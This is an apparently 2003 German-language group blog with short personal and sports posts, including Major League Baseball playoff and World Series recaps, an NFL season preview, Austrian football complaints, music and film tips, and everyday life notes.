first weekend of november  sTe  11.02.2003 21:32:23
in anbetracht der ungluecklichen konstellation der feiertage, hab ich mir freitag quasi freigenommen, um das wochenende 3 rechner zu assembeln;
apropos: das ist das neueste kommerzielle modding meiner neuen firma (credits to stekuenz)
smash the fuckin pumpkin  sTe  11.02.2003 21:20:35
thank god Halloween2k3 is over; imported from the USA for pure commercial purposes. anyway, i decided to point you to the extreme pumpkins site which has an alternative take on the traditional pumpkin...
ein kleiner  babsi  11.01.2003 23:42:18
netter zeitvertreib!
:: A Fan´s Ad  bully  29.10.2003 12:54:29

Mike Price, seines Zeichens langjähriger Fan des NFL-Teams Miami Dolphins kaufte letzten Freitag im Sportteil des Miami Herald eine Werbeseite (Kosten: 16.758 $) und fordert auf dieser die Entlassung des Headcoachs Dave Wannstedt und auch einen Wechsel auf der Quaterback-Position.

Price bietet dem Owner der Dolphins sogar 2 Mio Dollar pro Jahr, wenn er selbst das Team leiten dürfe. ;-))

Ein wirklich sehr amüsant zu lesender Beitrag. "Maybe I´m just a bozo who never made it. Or maybe I´m a high school drop out who had every bit of talent to go pro in more than one sport but found that girls and drugs were more fun between the ages of 17 & 19..."

Die ganze Seite gibts hier (pdf).

Die Miami Dolphins stehen zur Zeit übrigens bei 5 Siegen und 2 Niederlagen; was sollten da Austria Salzburg - Fans
(3 Siege, 10 Niederlagen) oder Detroit Lions - Fans (1 - 6) sagen???
we 25/26 oct 03  sTe  26.10.2003 20:33:45
sbg verloren - gws gewonnen / fast perfekter zwiebelrostbraten / my personality / server perfekt konfiguriert (auch als tv) / UHBP wie alle jahre wieder schleimen lassen...
:: let it snow  sTe  24.10.2003 13:56:57
so frueh wie schon lange nicht mehr begruessen wir die weisse pracht; das verkehrschaos blieb aus, da duerften die meisten wohl ordentlich bammel gehabt haben; der kleine kerl wurde entdeckt im museumsquartier auf der boccia-bahn :)
bye, bye winamp  sTe  22.10.2003 15:47:34
5 jahre hat er mich begleitet, doch dank AOL ist auch diese software outdated, und nicht mehr zeitgemaess;
ein grosses lob geht an apples iTunes welches absofort mein media player ist;
hervorragende library fuer alle mp3s, und spitzen radio qualitaet;
:: firebird  sTe  15.10.2003 20:10:24
mozilla firebird 0.7 steht zum download bereit; schlank, schnell, schpitze
:: mailinator  sTe  15.10.2003 12:44:56
fuer den fall dass man schnell eine email adresse braucht ohne spaetere wiederverwendung empfehle ich den mailinator
  sTe  13.10.2003 12:55:59
:: Major League Baseball 2003  bully  10.10.2003 18:53:38

Viel zu spät aber doch noch halbwegs rechtzeitig meld ich mich von den diesjährigen MLB-Playoffs. Bis jetzt hätts fast nicht besser laufen können, zwei uralt-Traditionsmannschaften sind in den Playoffs und ihnen gilt meine ganze Sympathie!!!

Die Chicago Cubs haben heuer das erste mal seit 1908 eine Playoff-Serie gewonnen, gratuliere!!!!
Playoff-Spiele im Wrigley Field; besser geht’s nicht!!!
Und als zweites die Boston Red Sox, die in den Divisional Series die Oakland A´s mit 3-2 Spielen besiegen konnten.

Viel Glück, Cubs und Red Sox!!!

Zur Zeit spielen beide Teams in den Championship Series; die Red Sox gegen die (unsympatischen im Fussball mit Bayern oder Real vergleichbaren ;-) )
New York Yankees und die Cubs gegen die noch unsympatischeren Florida Marlins.
Die Sieger der beiden Best-of-7-Series spielen ab Samstag (18.10.) bekannterweise in den World Series.



NLCS:
Chicago Cub vs. Florida Marlins 3 - 4


G1: Cubs - Marlins 8 - 9
G2: Cubs - Marlins 12 - 3
G3: Marlins - Cubs 4 - 5
G4: Marlins - Cubs 3 - 8
G5: Marlins - Cubs 4 - 0
G6: Cubs - Marlins 3 - 8
G7: Cubs - Marlins 6 - 9

ALCS:
Boston Red Sox vs. New York Yankees 3 - 4


G1: Yankees - Red Sox 2 - 5
G2: Yankees - Red Sox 6 - 2
G3: Red Sox - Yankees 3 - 4
G4: Red Sox - Yankees 3 - 2
G5: Red Sox - Yankees 2 - 4
G6: Yankees - Red Sox 6 - 9
G7: Yankees - Red Sox 6 - 5 (nach 2 Extra-Innings)


DANKE, DANKE, DANKE, DU VOLLIDIOT!!!
Eigentlich wollt ich ja erst während der World Series auf einzelne Spiele eingehen, aber was da heute gegen 5.00 Uhr früh unserer Zeit im Wrigley Field abgelaufen ist, war derart unglaublich, mir fehlten wirklich lange die Worte...
Spiel 6 der Championship Series (beim Stand von 3-2), Anfang des 8. (von 9) Innings, die Cubs führen solide mit 3-0 und der Weg in die World Series scheint frei...
Luis Castillo then hit a foul ball on the edge of the seats down the left-field line. Moises Alou reached up to make the catch, but a cubs fan reached for the ball and knocked it away just inches from Alou´s glove.
"Fans, they don´t go to school to be taught what balls to touch and what balls not to touch," said Alou, who was upset at the souvenir-seeking fan.
Ohne diesen einen Idioten wär dieses Spiel 3-1 für die Cubs ausgegangen und sie wären jetzt in den World Series; so aber gewannen die Marlins dieses Spiel 8-3 und gleichen in der Serie zum 3-3 aus. Dieser dumme, dumme Mensch wurde ca. noch 15 mal in Grossaufnahme im TV und im Stadion gezeigt, wurde auch mit Bier und dergleichen beworfen und musste zu seiner eigenen Sicherheit unter Polizeischutz das Stadion verlassen. Die TV-Kommentatoren philosophierten noch über das weitere Leben dieses Mannes (kurzfristig mal krankmelden und so wenig wie möglich aus dem Haus gehen und langfristig am besten nach Florida übersiedeln...).
more here and here ...


WORLD SERIES 2003

NEW YORK YANKEES - FLORIDA MARLINS 2 - 4

G1: Yankees - Marlins 2 - 3
G2: Yankees - Marlins 6 - 1
G3: Marlins - Yankees 1 - 6
G4: Marlins - Yankees 4 - 3
G5: Marlins - Yankees 6 -4
G6: Yankees - Marlins 0 - 2


hmmm... statt der erhofften World Series zwischen zwei Teams die 1908 und 1918 ihren letzten Titel holten, haben wir hier nun also die beiden Unsympathler; die Yankees und die Marlins.
Mir ist jetzt relativ egal, wer gewinnt, aber ich muss mir einfach ein Team aussuchen, sonst machts keinen Spass. Ab sofort halte ich das erste Mal (für maximal 10 Tage) zu den Yankees; sie haben einfach ein paar extrem geniale Spieler. Beispiele? Gerne...
Als ersten haben wir hier natürlich
Roger Clemens - The Rocket
• 1986: American League Most Valuable Player
• 1986: All-Star Game Most Valuable Player
• 1986: American League Cy Young Award
• 1987: American League Cy Young Award
• 1991: American League Cy Young Award
• 1997: American League Cy Young Award
• 1998: American League Cy Young Award
• 1998: ESPY Comeback of the Year
• 1999: Named to All-Century Team
• 2001: American League Cy Young Award
Der Cy Young Award geht übrigens immer an den besten Pitcher einer Saison. Clemens wird in den nächsten Tagen (Spiel 7??? ;-))) ) das letzte Spiel seiner Karriere pitchen; oh Mann, wohl der beste und erfolgreichste Pitcher aller Zeiten... Als zweites
Mariano Rivera
Der einzige sogar mir sehr sympathische Spieler der Yankees, seines Zeichens Closing Pitcher. Wenn er ins Spiel kommt (8. Inning oder später) ertönt im Yankee Stadium "Enter Sandman" und man weiss, das Spiel ist für die Yankees so gut wie gewonnen. Er ist derjenige, der den Sack zumachen soll und dies in 99% der Fälle wohl auch macht.
Und dann gibts da natürlich noch Stars wie Jason Giambi (1st Base), Derek Jeter (Shortstop und Mariah Carey´s Ex), Jorge Posada (Catcher) und viele mehr...

Zur Erklärung hier die diversen Positionen:


1: Pitcher
2: Catcher
3: First Base
4: Second Base
5: Third Base
6: Shortstop
7: Left Fielder
8: Center Fielder
9: Right Fielder

Und hier jetzt noch kurz der obligatorische Vergleich der beiden World Series Stadien:
Yankee Stadium und Pro Player Stadium


Uns erwarten ab der Nacht von Samstag auf Sonntag also bestimmt recht spannende World Series; mögen die Fische dasaufn!!!

GAME 1: 3 - 2 Marlins

Ok, zum 100. Geburtstag der World Series gewinnen die Marlins das erste Spiel und das auch noch auswärts leider nicht unverdient... Die Offense der Yankees hat heute Nacht einfach zu wenig produziert und viel zu viele Runner auf Base gelassen.
Bei den Marlins überzeugte die Defensive und offensiv vor allem Juan Pierre (Center Field), der den ersten Run erzielte und die weiteren zwei heimbrachte.
Sehr starkes Small Ball - Spiel (7 Singles!!!) und starkes Pitching sicherten letztendlich den Sieg.


GAME 2: 6 - 1 Yankees

Wie nach der gestrigen Partie nicht anders zu erwarten nehmen die Yankees die Marlins jetzt endlich ernst.
Kurzer Prozess war wohl die Devise von Spiel 2. Schon im ersten Inning stellte Hideki Matsui (Left Fielder, Japan) mit einem Three-Run-Homer auf 3 - 0, im vierten Inning erhöhte Alfonso Soriano (Second Base, Dom. Rep.) auf 6-0. Erst im letzten Inning scorten die Marlins ihren Ehrenpunkt.
Nach Spiel 1 hatten schon viele gemutmasst, dass das Feuer der Yankees heraussen sei. Sie haben in einem Wahnsinns-Spiel-7 den Erzrivalen, die Red Sox, besiegt, und jetzt warteten in den World Series halt die traditions- und farblosen Marlins. Für Spiel 1 mag das bestimmt zugetroffen haben, gestern aber merkte man vom ersten At-Bat an, dass die Yankees nun hochmotiviert sind und diese World Series unbedingt gewinnen wollen. Heute übersiedeln beide Teams ins wohlig warme Miami (spielfrei).


GAME 3: 6 - 1 Yankees

Warm stimmt, aber wohlig??? Teilweise regnete es heute Nacht in Miami wie aus Kübeln. Das Spiel musste beim Stand von 1-1 im 5. Inning sogar für ca. eine Stunde unterbrochen werden.
Aber auch nach der Regenpause dominierten Pitching und Defense die Partie; nach 7 Innings stands immernoch 1-1. Dann aber drehten die Yankees auf. Derek Jeter kam insgesamt auf 3 von 4. Darunter auch sein Run zum 2-1 im 8. Inning durch einen Single von Hideki Matsui. Im 9. Inning folgte noch ein 3-Run-Homerun von Bernie Williams (Center Fielder, Puerto Rico), der damit seit heute in den Kategorien Homeruns (19) und RBIs (65) die All-Time-Playoff-Rekorde hält!! Die Marlins hatten gegen Rivera im 9. Inning nichts mehr zuzusetzen und die Yankees führen in der Serie verdient mit 2-1


GAME 4: 4-3 Marlins (nach 3 Extra Innings)

Ich musste heute leider sehr früh arbeiten, und konnte deshalb Spiel 4 nicht verfolgen... :-(((
BERICHT


GAME 5: 6-4 Marlins

Die Marlins gehen mit 3-2 in Führung, ärgerlich. David Wells (USA), Starting Pitcher der Yankees heute Nacht, musste schon im ersten Inning verletzungsbedingt (Rücken) den Mount verlassen. Damit war diese Partie so gut wie gelaufen. Der Bullpen der Yankees war trotz einer 1-0-Führung einfach nicht in der Lage das Spiel über sechs, sieben Innings bis zu Mariano Rivera zu tragen. Die Marlins scorten 3 Punkte im zweiten Inning, einen im vierten und weitere zwei im fünften.
Das war nun also die letzte Begegnung im Pro Player Stadium, ab heute ist es zumindest bis Ende Dezember wieder ein reines Football Stadion (hoffe, dass die Dolphins NICHT in die Playoffs kommen!!!). Beide Teams übersiedeln heute wieder nach New York, wo die letzten (hoffentlich) 2 Spiele stattfinden werden.


GAME 6: 2 - 0 Marlins

:-(((((((((((((((((((((((((((((((((((((((((((



World Champion 2003: Florida Marlins

gratuliere...
:: Skull Ring  sTe  11.06.2003 01:18:08
viel zulang schon erwartet: new iggy has landed!!!
no matter how late it is, its time for a beer :)
one word: whatever...oder doch ...the riff is fuckin dead...
wems zu langsam ist der warte auf die bonus tracks :)
:: newseum  sTe  10.06.2003 16:07:08
248 newspaper (incl. austrian) front pages from 34 countries presented every day...
:: Uma will KILL BILL  bully  11.03.2003 01:12:02
Ab 16.10. auch in unseren Kinos:

KILL BILL ( Trailer + Interview )
das neueste Meisterwerk Quentin Tarantinos!!!

maaaaaaaaah, i gfrei mi scho soooo!!!!

Bei einem Pre-screening von „Kill Bill“ erklärte Tarantino dem anwesenden Keanu Reeves:
´You know, my guys are all real. There´s no computer fucking around. I´m sick to death of all that shit. This is old school with fucking cameras. If I´d wanted all that computer game bullshit, I´d have gone home and stuck my dick in my Nintendo.´
Erstmal warmgeredet fährt er fort: ´This CGI bullshit is the death knell of cinema. Movies are far too fucking expensive at the moment and it´s killing the fucking art form. The way it´s going, in ten year´s time it will officially be killed.´

Teil 2 folgt im Februar 04 !!!
:: farewell nofrontiere  sTe  10.01.2003 07:00:00
ein wichtiger abschnitt geht mit dem heutigen tag zu ende; mit doch ein wenig wehmut verkuende ich meinen abgang von nofrontiere um in neue ufer aufzubrechen (...details folgen);
6 jahre gehen nicht ´spurlos´ an einem vorbei, seis wegen der vielen mitarbeiter mit denen man arbeiten durfte oder manchmal auch musste :) , oder all den kunden, wobei das durfte/musste hier erst recht zutrifft , ...es ueberwiegt das positive... und vor allem das das gelernte...
trotzdem oder gerade darum, jetzt laut und mit stromgitarren bitte:

...darum sagen wir auf wiedersehen, die zeit mit euch war wunderschoen, es ist wohl besser jetzt zu gehn, wir koennen keine traenen sehn,...schoenen gruss und auf wiedersehn...
:: resting place  sTe  30.09.2003 20:32:50
entdeckt bei einem allseits bekannten kaffeeroester: den bettsitz !!!
"So wie der Adler immer wieder zu seinem Horst zurückkehrt, kehren auch wir stets dorthin zurück, wo wir´s am gemütlichsten haben"
man beachte die praktische tasche fuer die fernbedienung....
unpackbar...
:: i don´t like mondays  sTe  29.09.2003 12:47:15
wetter scheisse / tochter krank / auto zum x-ten mal aufgebrochen vorgefunden / viel zuviel arbeit / ich meine das reicht...
:: barbecue  sTe  24.09.2003 11:37:22
sensationelles zu berichten: die Salzburger "Barbecue Bulls" sind zweifache weltmeister bei den 5. World Barbecue Championships in Montego Bay, Jamaica geworden.
wir gratulieren herzlichst und sind maechtig stolz :)
:: Coole Digitaluhren  bully  23.09.2003 17:41:01
hier und hier ...
:: governator  sTe  17.09.2003 14:44:02
new survey on the left, and some campaign-pics: one, two, three and four ...
:: family business  sTe  14.09.2003 17:45:59
neue buchhandlung in der Landstrasser Hauptstr.: Liber Novus
feelo steuert das firmenlogo und die website bei...



:: Falcostiege  bully  09.12.2003 16:19:13


Heute vormitag wurde in Wien Margareten eine kleine unscheinbare aber nicht unwichtige Stiege (von der Rechten Wienzeile zum Naschmarkt rauf) in Falcostiege umbenannt...
:: hurt  sTe  09.12.2003 13:05:08
wir trauern um einen großartigen musiker...
Johnny Cash ist heute in Nashville verstorben...
der man in black wird uns fehlen...

"An old cowboy went riding out
one dark and windy day

Upon a ridge he rested as he
went along his way..."
:: evil  sTe  09.10.2003 13:35:59
Infrasound produces strange effects in people including anxiety, extreme sorrow and chills... maybe even feelings of ghostly presence.

and the Ford Ka has an evil twin

btw greetings from 007
:: BILDUNGSAUFTRAG  bully  10.09.2003 00:59:03

HIER eine geniale Weltkarte (inklusive extremer Zoom-Möglichkeiten)

HIER eine Art Weltalmanach; zwar von der CIA, in vielen Bereichen aber extrem interessant.
:: feelo champ 03/04  sTe  09.07.2003 21:03:01
jetzt is soweit, feelo champ 03/04 ist online!
hoffe dass es aehnlich spannend wird wie letzte saison,
viel spass
:: winning ugly  sTe  09.07.2003 13:40:57
und der tenniszirkus ist wieder um eine amerikanische "kretzn" reicher...
Andy Roddick
als ob er nicht schon vor einem jahr unangenehm war, so hat er jetzt oberungustl Brat Gilbert als coach verpflichtet;
dessen unnoetige "Psychotricks" konnte man gestern wieder einmal bei den semifinal match gegen David Nalbandian verfolgen: beim stand von 2:0 saetzen gegen Roddick, liess sich dieser minutenlang an den zehen behandeln, verzoegerte muehsam das spiel und machte ein maetzchen nach dem anderen;
wie das spiel ausgegangen ist brauch ich wohl nicht mehr anfuehren.
aber aufschlagen kann der bursche, das muss man neidlos anerkennen; aber ein grosser wird DER nicht (fuer mich jedenfalls...)
:: Fassungslos und deprimiert...  bully  09.06.2003 14:47:39
...muss ich hier öffentlich verkünden, dass der Sportartikelgigant Nike vorgestern um $305 Mio die Kultmarke CONVERSE geschluckt hat...
WEHE ES WIRD AUCH NUR IRGENDWAS AN DER PRODUKTPALETTE GEAENDERT!!!
DAS würde grobe Konsequenzen nach sich ziehen!!!


WEGEN FEHLENDER AKTUALITÄT GELÖSCHT
:: bad taste in italy  sTe  09.05.2003 17:28:31
im urlaub in fast allen wein geschaeften selbst gesehen - fast nicht fuer moeglich gehalten - und offenbar verdraengt;
jetzt wieder daruebergestolpert:
der angeblich geschichtsliebende weinproduzent Alessandro Lunardelli
vertreibt mitlerweile seit 8 jahren weine mit etiketten auf denen hitler, goering oder mussolini abgebildet sind unter dem produktnamen ´führerwein´;

bleibt nur zu hoffen dass diese spaetlese der besondern art ein sauerampfer fuer die fuehrertreue ist...
:: 04  sTe  09.04.2003 15:53:15
Ein anderes ist: auf etwas antworten,
ein anderes: etwas beantworten.
(G.E. Lessing)

dumme antworten.
:: NFL - SEASON PREVIEW 2003  bully  09.02.2003 18:17:14

Übermorgen (Sept., 04) ist es endlich wieder soweit; die NFL startet nach 8-monatiger Pause in die neue Saison. Vorhersagen sind wie immer schwierig; ich wage es aber trotzdem ;-)
ok, die frage „wer gewinnt im Jänner die Superbowl?“ ist nicht leicht zu beantworten; Favoriten gibt’s natürlich immer; hier die von betandwin.com: Bucs (7.0), Eagles (8.0) Dolphins (9.0) und Rams (10.0).
Bei Bucs und Eagles schliess ich mich gern an; dazu geb ich aber eher noch Jets, Titans und Giants...
Hier nun aber meine Tipps Division für Division:

AFC EAST:
New England Patriots
Buffalo Bills
Miami Dolphins
New York Jets


Die Horrordivision schlechthin, ausser den Dolphins eigentlich lauter sympatische Teams ;-). Mein Tipp: es läuft auf ein knappes Finish zwischen Patriots und Jets hinaus, in dem sich die Jets durchsetzen; Patriots bekommen Wildcard.

AFC NORTH:
Baltimore Ravens
Cleveland Browns
Pittsburgh Steelers
Cincinnati Bengals


Favorit sind hier wohl die Steelers; ich tipp jetzt aber trotzdem mal auf die Browns.

AFC SOUTH:
Tennessee Titans
Indianapolis Colts
Jacksonville Jaguars
Houstan Texans


Hier sollten sich die Titans klar durchsetzen, auch wenn die Colts über ein sehr starkes Team verfügen.

AFC WEST:
Oakland Raiders
Denver Broncos
Kansas City Chiefs
San Diego Chargers


Wie die AFC East ist auch die AFC West eine sehr starke Division; jeder kann hier erster werden. Topfavorit für mich sind aber hier auch heuer wieder die Raiders, wenngleich ich den Chargers eine sehr starke Spielzeit zutraue.


NFC EAST:
Dallas Cowboys
Philadelphia Eagles
Washington Redskins
New York Giants


Hier klare Vorteile für die Eagles, ohne Frage; auch wenn die Giants gewiss eine starke Rolle spielen werden (Wild Card??)

NFC NORTH:
Green Bay Packers
Chicago Bears
Minnesota Vikings
Detroit Lions


Die Überraschung der Saison: die Lions gewinnen die NFC North ganz knapp vor den Packers; auch wenn sich James Stewart (bester Running Back der Lions der letzten 3 Jahre) gerade im letzten Spielzug der Preseason die Schulter ausgekegelt hat. Er fällt die ganze Saison aus, als Ersatz wurde vorgestern Olandis Gary (logischerweise Running Back) von den Bills verpflichtet. Favre wird alt und hätte wohl heuer zurücktreten sollen ;-); die Lions sind heiss, aber auch die Bears werden im neuen Stadion wohl sehr engagiert sein.

NFC SOUTH:
Tampa Bay Buccaneers
CarolinaPanthers
New Orleans Saints
Atlanta Falcons


Der Titelverteidiger aus Tampa geht hier natürlich als klarer Favorit ins Rennen, aber sie sollten die Falcons nicht unterschätzen…

NFC WEST:
St. Louis Rams
San Francisco 49ers
Seattle Seahawks
Arizona Cardinals


In der NFC South werden nach einem grausamen Jahr die Rams wieder das bessere Ende für sich haben; 49ers maximal mit Chancen auf die Wild Card.


Ich wünsche allen Football-Fanatics eine atemberaubende Saison!!!
ENJOY!!!

(SPIELPLAN)
:: weekend summary  sTe  09.01.2003 10:27:31
bei dieser gelegenheit einen der schoensten wiener fussballplaetze entdeckt (leider privat) / ein wenig arbeit / mia & music / und der erste punkt von sv salzburg
:: you´re at home baby  sTe  29.08.2003 11:13:07
feelos neues mobile desktop
:: ja - klar  sTe  28.08.2003 19:16:27
ja!

Link =crazy indeed!
:: ICKE IST DA  bully  26.08.2003 17:06:10

Nach intensiven Verhandlungen konnte unser Präsident Rudi Quehenberger heute Nachmittag eine Einigung mit dem 101-fachen Nationalspieler, Weltmeister Thomas „Icke“ Häßler über vorerst einen Ein-Jahresvertrag mit der Option auf ein weiteres Jahr erzielen.

Die Verpflichtung von Thomas Häßler ist mittels einer Sonderfinanzierung zustande gekommen.

Vorbehaltlich einer ärztlichen Untersuchung morgen, Mittwoch, 27. August 2003 um 9.00 Uhr in Rif steht dem Engagement dieses renommierten Spielers nichts mehr im Wege.

Um 9.30 Uhr trainiert Thomas Häßler im ULSZ Rif erstmals mit der Kampfmannschaft des SV Wüstenrot Salzburg.

Um 11.30 Uhr wird Thomas Häßler dann im Rahmen einer Pressekonferenz im ULSZ (Seminarraum 3) den Medien präsentiert.

Statement Rudi Quehenberger zur Verpflichtung Thomas Häßlers: „Durch Ickes Verpflichtung erwarte ich mir, dass auch ein nötiger spielerischer Impuls in die Mannschaft hineinkommt. Thomas Häßler soll im Rahmen des Heimspiels gegen die Wiener Austria am kommenden Sonntag erstmals den Fans präsentiert werden.“
:: Für Spiele-Nostalgiker ;-)  bully  26.08.2003 12:18:30
Check THIS out !!
:: wedding pics...  sTe  25.08.2003 23:56:40
here they are... (thanks to the schreiners)
:: wishing you life best !!!  sTe  24.08.2003 19:04:05

:: Sobig.F  sTe  22.08.2003 16:47:56
man darf gespannt sein was heut um 19:00 21:00 passiert
(vielleicht ja auch gar nix:) )
:: mo(o)re  sTe  19.08.2003 23:58:09
wenn Michael Moore ein sogenannter ´pseudo-celebrity who has made a career out of: staged scenes, twisted statistics, faked editing, and shameless self-promotion of his blather at award shows and other public events´ ist, dann sind die macher dieser site entweder die einzigen noch existierenden Bush-fanatics oder springen bewusst auf das da-ist-einer-gegen-was-und-hat-erfolg-damit, und-da-haengen-wir-uns-dran und-machen-damit-auch-vielleicht-noch-kohle;
objektive widerlegungen seiner recherchen kann ich sonst nicht entdecken...
:: long weekend summary  sTe  18.08.2003 12:14:51
nice grillerei in purkersdorf / geronimo hat das zeitliche gesegnet und ist in die ewigen jagdgruende abgetaucht / auch beim 3.versuch mir tomb raider II anzuschauen eingeschlafen / und die schmerzvolle erkenntnis gemacht, dass jetzt bis dezember kein feiertag mehr ist :(
:: LARS  bully  17.08.2003 15:13:46

normalerweise bin ich ja eher der letzte, der eine trainerdiskussion ins laufen bringt, aber zumindest darüber gesprochen sollt jetzt mal werden, find ich.

die leistung all unserer spieler ist zur zeit unterdurchschnittlich bis grauenhaft und die einstellung der mannschaft passt einfach überhaupt nicht. beides faktoren, für die der trainer mit- bis hauptverantwortlich ist.

nach dem schlechtesten saisonstart seit 40 jahren muss man wohl über die position des trainers nachdenken. irgendwie kommt mir vor, dass lars söndergaard nicht mehr zu seinen spielern durchkommt. natürlich kann man einmal fünf spiele in folge verlieren, und ich war auch letzten herbst immer ganz felsenfest davon überzeugt, dass es besser ist am trainer festzuhalten und der erfolg gab der führungsetage auch recht, aber entscheidend ist hier schon, wie die spiele heuer alle verloren werden; einmal im rückstand ist kaum mehr ein aufbäumen zu bemerken... kein geist im team... kein wille...

so sehr ich lars s. mag und so dankbar ich ihm auch für die superleistung im frühjahr und den einbau all der jungen spieler bin, so bin ich nun trotzdem der meinung, dass ein neuer trainer hergehört, der frischen wind ins training und in die mannschaft bringt und (hoffentlich) ein neues feuer entfacht.

my opinion: sorry lars, time to go!!!
(schonfrist noch bis samstag in graz! maximal!!!)
:: mus[ic]e @ its best  sTe  09.11.2003 01:01:11
mit dem album ´Absolution ´ von ´Muse´ geht ein potentieller kandidat um platz 1 der feelo-album-charts 2003 ins rennen; die geplante single ´Time Is Running Out´ reisst mich zwar (cor: ist doch schwer ok) in anbetracht einiger anderen haemmer wie zb ´Hysteria´ nicht ganz so mit, aber das kann ja auch positiv sein :);
irgendwie vermischen sich eindruecke von t-rex mit placebo, pink floyd mit queen und bowie zu einem ganzen, ja arschgeilen klangteppich: bestes beispiel ´Butterflies and Hurricanes´
(f) feelosophee recommended !!!
:: kaum sind die alten aus dem haus,  sTe  08.10.2003 21:43:01
...kriegen die mehrschweine junge....;
2 tage ausser haus und schon haben geronimo und wynona 2 putzige 1:1 kopien von jedem von einander angefertigt; ca 5 cm gross und quasi out-of-the-box-fertig; wie die grossen nur halt kleiner,...stellt sich die frage wie laut die geburt war :) wir werns wohl nie erfahren...
namensvorschlaege sind willkommen...
(...aber nicht fix und foxi, oder flip und flop :) bitte )

UPDATE: seit heute ist big geronimo kastriert :(
:: BUNDESLIGA RESTARTED  bully  08.09.2003 12:14:46

ok, ok, es sind zwar erst 3,5 runden gespielt, aber so wie das heuer wieder anfängt macht das nicht gerade lust auf mehr...

die sympatischte mannschaft ist letzter
die unsympatischte mannschaft ist erster

:-(((

es wird jetzt wirklich zeit, dass sich unsere salzburger am riemen reissen und mit der selben einstellung und motivation in die spiele gehen wie noch vor wenigen wochen im frühjahr 03.
gerade heute in pasching wird das womöglich doppelt schwer; ohne kirchler und pfeifenberger gegen die hochmotivierten ui-cup-fighter (gratuliere diesbezüglich übrigens herzlich!), aber in den nächsten spielen MUSS jetzt einfach eine siegesserie beginnen, sonst ist die ligasaison schon nach wenigen spielen eigentlich schon wieder vorbei!!!

gemma burschen!!! zammreissen, kämpfen und beissen, der rest kommt dann von selbst!!!!
:: feelo champ 03/04  sTe  08.05.2003 14:23:02
langsam wirds spannend...
vorab hier mal der erste entwurf;
mit der bitte sich einen rasen auszusuchen (switch background link)
:: update  sTe  08.04.2003 19:57:30
btw new project site
:: leech kind a p2p and somehow not...  sTe  08.02.2003 20:24:29
nach einem monat testen, kann ich melden dass "BitTorrent" also wirklich doch ein unglaubliches potenzial hat;
kurz: hierbei handelt es sich um ein neues protokol dass den datentransfer p2p like ermoeglicht; ein zentraler server entfaellt; die fragmente einer datei werden von den jeweiligen usern zur verfuegung gestellt (seeds); dh jeder der sich eine datei saugt MUSS auch ein solcher seed sein, download ohne upload is nicht (leech resistance); neben dem client braucht man auch noch die sogenannten tracker (diverse websites) die die dateien publik machen;
und die tatsache dass ebendiese zz wie die schwammerl aus dem boden spriessen, laesst auf grosse verbreitung schliessen; auch wenn man sagen muss dass viele dieser sites oft nur sehr kurzem dasein fristen;
fazit: fuer isos und groessere datein :) mahr als brauchbar
PS: der beste client mm ist BT++
:: Handy-Weitwurf-WM  bully  08.01.2003 15:01:32
Auf der finnischen Insel Riihisaari findet am 23. August bereits zum vierten Mal die Handy-Weitwurf Weltmeisterschaft statt. An der WM darf jeder im Alter von zwölf bis hundert teilnehmen. Es gibt zwei Kategorien: Bei der „klassischen Art“ muss man einfach möglichst weit werfen, in der „Freestyle Kategorie“ kann man durch kunstvolle Wurftechniken beeindrucken. Die Wurfgeschosse werden vom Veranstalter zu Verfügung gestellt. Man darf aber auch mit seinem eigenen Handy antreten. Der offizielle Weitwurfrekord liegt derzeit bei 66,72 Metern. Allerdings macht ein Ukrainer von sich reden, der sein Handy 93 Meter weit geworfen haben soll. Ob dabei die Rahmenbedingungen eingehalten wurden, weiß man nicht. Neben der Rekordjagd soll das Handy-Weitwerfen auch dabei helfen, Frust und Aggression durch Schleudern des Mobiltelefons abzubauen.
:: misc  sTe  30.07.2003 16:55:23
this made the author feel sick...
das bravo starschnitt register (von 1959 bis heute)...(via p3k)
:: therapy?  sTe  29.07.2003 13:47:30
meine sportlichen aktivitaeten muessen fuer 3 wochen auf eis gelegt werden, meinte der medico :(
statt dessen stehen schlammpackungen, ultraschall und gymnastik auf dem programm;
und am besten waers nicht den ganzen tag zu sitzen - find ich eh auch - nur laesst sich das schwer machen...
:: robbery  sTe  27.07.2003 14:50:18
und schon wieder haben irgendwelche sackgesichter meinem auto den golfstich verpasst und das radio entwendet $*@&
langsam kann ich mich heavy-tester der neuesten autoradios nennen;
sportler waren die uebeltaeter anscheinend nicht, denn tennisschlaeger und fussball liessen sie unagetastet, ebenso wie die mp3 spindeln *uff*
wenigstens deckt die versicherung den schaden...
:: movieTime  sTe  25.07.2003 13:10:31
eine kleine uebersicht was actionmaessig so in naechster zeit auf die leinwand kommt:
:: quote of the day  sTe  24.07.2003 11:24:18


´I´m the Dude. So that´s what you call me. That, or Duder. His Dudeness. Or El Duderino´
:: high resolution  sTe  23.07.2003 09:37:37
the Blue Marbel is supposed to be the most detailed true-color image of the entire Earth to date. I could stare at it for hours.
take a look at the
Western Hemisphere
Eastern Hemisphere
and the close ups at full (1km per pixel) resolution
:: too hot in the city  sTe  21.07.2003 19:55:42


35º = arbeitsverweigerung; statt dessen blau gemacht, und rauf zum cobenzl;
nach einem ausgedehnten spaziergang durch wald und wiese, beim heurigen auf schnitzl und grillhendl eingekehrt; war sicher nicht das letzte mal
:: rebell yell  sTe  18.07.2003 22:49:50
als strohwittwer kommt man auf so manche ideen;
vor allem wenn man sich ´the italian job anschaut´ und ´black rebel motorcycle club´ eine neue grenzgeniale scheibe rausbringen;
und ebendiese dort ,wo meine jamc aufhoeren, mit einer brachialen direktheit nahtlos an (wohlbemerkt ohne den elektronischen schnickschnack!) weitermachen, und sie dir dir den geschmack von staub und benzin auf dem gaumen bringen; zurueck zu meiner vorstellung: ich war ja schon mal am highway one, aber das ganze jetzt mit einer v-rod, oder zuruck zum italienischem job, einem mini mit ordentlichem sound-equipment als ballast,...

:: beatallica  sTe  17.07.2003 01:59:00
manchmal entdeckt man im net sachen welche den glauben am
nutzen des netzes wieder staerken; ohne die platform haetten die jungs
wohl kaum eine moeglichkeit ihr gut an den man zu bringen; aber so
haben sie das zeug zum hype, berechtigt wie ich meine; musikindustrie, wach endlich auf!!! - die kuenstler brauchen euch nur mehr bedingt!!!
:: migration  sTe  15.07.2003 11:17:51
feelosophees provider hat letzte woche auf windows 2003 server umgestellt; daher kann in naechster zeit es bei einigen seiten zu fehlern kommern; das meiste ist eh schon angepasst, aber der hund liegt wie immer im detail :( (fehlermeldungen bitte sofort melden...)

auf jedenfall kann er jetzt auch aspx, was ganz neue moeglichkeiten eroeffnet...
mal schaun...
:: vokuhila gewinnt $193M. !!!  bully  14.07.2003 22:27:24
tja, liebe lotto-spieler...
SO sehen lottomillionäre aus... :-((
näheres hier
"I knew I had to win if I ever wanted a big TV"
